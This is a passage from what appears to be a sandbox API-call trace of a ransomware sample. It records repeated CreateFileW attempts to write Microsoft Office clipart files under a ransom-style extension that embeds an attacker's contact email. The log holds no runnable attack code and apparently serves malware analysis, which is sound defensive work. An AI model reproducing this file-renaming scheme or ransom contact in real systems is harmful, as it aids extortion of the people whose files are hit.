office\\root\\clipart\\pub60cor\\na00433_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.819] CloseHandle (hObject=0x434) returned 1 [0167.819] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.819] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00438_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00438_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.820] CloseHandle (hObject=0x434) returned 1 [0167.821] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.821] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00452_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00452_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.821] CloseHandle (hObject=0x434) returned 1 [0167.823] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.823] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00454_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00454_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.823] CloseHandle (hObject=0x434) returned 1 [0167.824] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.824] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00458_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00458_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.825] CloseHandle (hObject=0x434) returned 1 [0167.826] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.826] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00462_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00462_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.827] CloseHandle (hObject=0x434) returned 1 [0167.831] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.831] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00487_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00487_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.831] CloseHandle (hObject=0x434) returned 1 [0167.833] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.833] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00494_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00494_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.833] CloseHandle (hObject=0x434) returned 1 [0167.834] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.834] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.834] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00512_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00512_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.834] CloseHandle (hObject=0x434) returned 1 [0167.835] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.835] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.835] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00523_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00523_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.835] CloseHandle (hObject=0x434) returned 1 [0167.836] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.836] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00525_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00525_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.837] CloseHandle (hObject=0x434) returned 1 [0167.837] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.837] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00530_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00530_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.838] CloseHandle (hObject=0x434) returned 1 [0167.838] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.838] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00532_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00532_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.839] CloseHandle (hObject=0x434) returned 1 [0167.840] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.840] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00538_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00538_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.840] CloseHandle (hObject=0x434) returned 1 [0168.155] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.155] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00641_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00641_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.156] CloseHandle (hObject=0x528) returned 1 [0168.157] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.157] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00784_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00784_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.157] CloseHandle (hObject=0x528) returned 1 [0168.158] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.158] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.158] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00798_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00798_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.158] CloseHandle (hObject=0x528) returned 1 [0168.159] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.160] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.160] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00806_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00806_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.160] CloseHandle (hObject=0x528) returned 1 [0168.161] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.161] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00807_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00807_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.161] CloseHandle (hObject=0x528) returned 1 [0168.162] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.162] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00808_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00808_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.162] CloseHandle (hObject=0x528) returned 1 [0168.163] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.163] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.163] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00809_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00809_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.163] CloseHandle (hObject=0x528) returned 1 [0168.164] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.164] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00810_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00810_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.164] CloseHandle (hObject=0x528) returned 1 [0168.166] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.166] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00932_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00932_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.166] CloseHandle (hObject=0x528) returned 1 [0168.167] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.167] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01064_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01064_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.167] CloseHandle (hObject=0x528) returned 1 [0168.169] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.169] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01066_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01066_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.169] CloseHandle (hObject=0x528) returned 1 [0168.171] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.171] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01069_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01069_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.171] CloseHandle (hObject=0x528) returned 1 [0168.172] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.172] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01123_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01123_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.173] CloseHandle (hObject=0x528) returned 1 [0168.173] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.173] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01126_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01126_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.174] CloseHandle (hObject=0x528) returned 1 [0168.174] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.174] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01130_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01130_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.175] CloseHandle (hObject=0x528) returned 1 [0168.176] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.176] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01141_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01141_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.176] CloseHandle (hObject=0x528) returned 1 [0168.177] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.177] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01148_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01148_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.177] CloseHandle (hObject=0x528) returned 1 [0168.178] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.178] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01149_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01149_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.178] CloseHandle (hObject=0x528) returned 1 [0168.178] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.178] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01152_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01152_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, 